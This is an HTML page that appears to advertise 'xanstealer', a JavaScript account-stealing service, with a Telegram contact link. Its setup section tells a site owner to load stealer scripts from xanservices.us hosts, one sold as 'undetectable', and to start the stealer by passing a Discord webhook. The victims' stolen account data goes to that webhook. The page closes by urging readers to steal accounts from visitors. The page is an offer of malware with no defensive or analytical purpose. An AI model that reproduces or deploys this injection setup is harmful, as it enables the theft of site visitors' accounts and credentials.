<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
  body {
  background-color: #000;
  color: #fff;
  font-family: 'Arial', sans-serif;
  text-align: center;
}

.container {
  max-width: 800px;
  margin: 0 auto;
  padding: 20px;
}

.button {
  background-color: #9c27b0; /* Jasnofioletowy kolor przycisku */
  color: #fff;
  padding: 10px 20px;
  border: none;
  border-radius: 5px;
  cursor: pointer;
  margin-right: 20px;
  text-decoration: none;
}

.button:hover {
  background-color: #7b1fa2; /* Zmiana koloru po najechaniu kursorem */
  text-decoration: none;
}

.telegram-icon {
  display: inline-block;
  opacity: 0.5;
}

.telegram-icon img {
  width: 30px;
  height: 30px;
}
  
/* Resetowanie domyślnych stylów dla textarea */
textarea {
  font-family: 'Courier New', monospace;
  font-size: 14px;
  line-height: 1.6;
  padding: 10px;
  border: 1px solid #ddd;
  border-radius: 5px;
  background-color: #222;
  color: white;
  resize: none; /* Zapobiega zmianie rozmiaru */
  width: 100%;
  height: 120px;
  box-sizing: border-box;
}

/* Dodatkowy styl dla aktywnego textarea */
textarea:focus {
  outline: none;
  border-color: #4CAF50; /* Kolor obramowania po aktywacji */
  box-shadow: 0 0 5px rgba(76, 175, 80, 0.8); /* Cień po aktywacji */
}

/* Styl dla textarea z błędem */
textarea.error {
  border-color: #ff0000;
}

/* Dodałem dodatkowy styl dla placeholder'a */
textarea::placeholder {
  color: #aaa;
}

</style>
  <title>xanstealer</title>
</head>
<body>
  <div class="container">
    <h1>
      xanstealer
      
    </h1>
 <p>
   v1.0.1
    </p>
    <br>
    <div class="telegram-icon"><a href="https://t.me/xancheck"><img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpngimg.com%2Fuploads%2Ftelegram%2Ftelegram_PNG12.png&f=1&nofb=1&ipt=3241016a32a4794e141eaebe23aac04652870a3908bd6a3031cb63b7b57c5139&ipo=images" alt="Telegram Icon"></a></div> <br>
    <br><br><br><br>
    <h3>
      General setup
    </h3>
    <p>
      Import one of our libraries to your site by html script in head (it can be github or smth).
    </p>
    <textarea> 0x.xanservices.us - normal stealer (can be detected) 
 inx.xanservices.us - undetectable stealer</textarea>
    <p>
      or
    </p>
    <textarea>
https://xanservices.us/v1/stealer.js
https://xanservices.us/v1/inx.js</textarea>
    <br> <br>
    <h3>
      After that, intialize your stealer.
    </h3>
    <p>
       using html script in head/body.
    </p>
    <textarea>
<script>
// set your discord webhook
var webhook = 'your webhook';
// run stealer
run(webhook);
  </script></textarea>
    <br>
    <h2>
      And right now you're ready to steal accounts from that motherfuckers! 
    </h2>
  </div>
</body>
</html>
